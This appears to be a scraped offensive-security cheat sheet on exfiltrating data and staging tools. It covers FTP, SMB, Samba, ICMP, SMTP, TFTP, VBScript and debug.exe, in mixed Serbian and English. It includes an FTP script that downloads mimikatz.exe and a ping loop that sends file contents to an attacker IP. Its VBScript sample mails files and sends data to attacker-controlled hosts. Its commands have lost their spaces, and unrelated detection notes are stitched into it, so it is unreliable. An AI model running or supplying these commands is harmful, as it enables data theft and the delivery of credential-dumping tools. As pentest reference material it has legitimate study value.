#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Windows klijent
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
SMB
Kali kao server
kali_op1>impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2>smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Ili kreirajte smb deljenje koristeći sambu:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
Windows
Exfiltration
Exfiltration Over Alternative Protocol
Description
Data exfiltration can be achieved using various protocols other than HTTP/HTTPS, such as DNS, ICMP, or SMTP.
Detection
Monitor network traffic for unusual DNS requests, especially those containing encoded data.
Look for abnormal ICMP or SMTP traffic patterns.
Implement egress filtering to restrict unnecessary outbound traffic.
Prevention
Use encryption to protect data in transit.
Implement network segmentation to limit lateral movement.
Disable unnecessary services and protocols to reduce attack surface.
Tools
dnscat2: A tool for tunneling data through DNS servers.
Iodine: A tool for tunneling IPv4 data through a DNS server.
Exfiltration Over Unencrypted Protocols
Description
Attackers can exfiltrate data over unencrypted protocols like FTP, Telnet, or SNMP.
Detection
Monitor network traffic for FTP, Telnet, or SNMP connections.
Look for large amounts of data being transferred over these protocols.
Implement deep packet inspection to analyze payload contents.
Prevention
Use secure protocols like SFTP, SSH, or SNMPv3.
Implement strong authentication mechanisms.
Encrypt data at rest and in transit.
Tools
Wireshark: A network protocol analyzer for monitoring and analyzing network traffic.
Snort: An open-source network intrusion detection and prevention system.
CMD-Wind> \\10.10.14.14\path\to\exeCMD-Wind>netusez: \\10.10.14.14\test/user:testtest#For SMB using credentialsWindPS-1>New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\10.10.14.9\kali"WindPS-2>cdnew_disk:
NC (Netcat) je moćan alat za mrežno programiranje koji se često koristi za prenos podataka između sistema putem mreže. Može se koristiti za izvršavanje različitih zadataka, uključujući i eksfiltraciju podataka.
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
SMTP
Ako možete slati podatke na SMTP server, možete kreirati SMTP da primite podatke pomoću python-a:
sudopython-msmtpd-n-cDebuggingServer:25
TFTP
Podrazumevano u XP i 2003 (u drugima mora biti eksplicitno dodato tokom instalacije)
Na Kali, pokreni TFTP server:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
VBScript can be used to exfiltrate data from a compromised system. Below are some common techniques:
Writing to Files: VBScript can write data to a file on the system, which can then be exfiltrated using various methods.
Sending Emails: VBScript can be used to send emails with the exfiltrated data as attachments or within the email body.
HTTP Requests: VBScript can make HTTP requests to an external server controlled by the attacker to exfiltrate data.
DNS Requests: VBScript can make DNS requests with encoded data to exfiltrate information.
Example VBScript Exfiltration Code
' Example VBScript code for exfiltrating data
' Write data to a file
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\exfiltrated_data.txt", True)
objFile.Write "Sensitive data to exfiltrate"
objFile.Close
' Send an email
Set objEmail = CreateObject("CDO.Message")
objEmail.From = "attacker@example.com"
objEmail.To = "recipient@example.com"
objEmail.Subject = "Exfiltrated Data"
objEmail.TextBody = "Attached is the exfiltrated data."
objEmail.AddAttachment "C:\exfiltrated_data.txt"
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.example.com"
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
objEmail.Configuration.Fields.Update
objEmail.Send
' Make an HTTP request
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objHTTP.Open "GET", "http://attacker-controlled-server.com/exfiltrate.php?data=exfiltrated_data", False
objHTTP.Send
' Make a DNS request
Set objDNS = CreateObject("MSXML2.ServerXMLHTTP")
objDNS.Open "GET", "http://attacker-controlled-dns.com", False
objDNS.Send
These are just a few examples of how VBScript can be used for exfiltration. It is important to note that using VBScript for malicious purposes is illegal and unethical.
Program debug.exe ne samo što omogućava inspekciju binarnih fajlova već takođe ima mogućnost da ih rekonstruiše iz heksadecimalnog koda. To znači da, pružajući heksadecimalni kod binarnog fajla, debug.exe može generisati binarni fajl. Međutim, važno je napomenuti da debug.exe ima ograničenje u sastavljanju fajlova do veličine od 64 kb.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt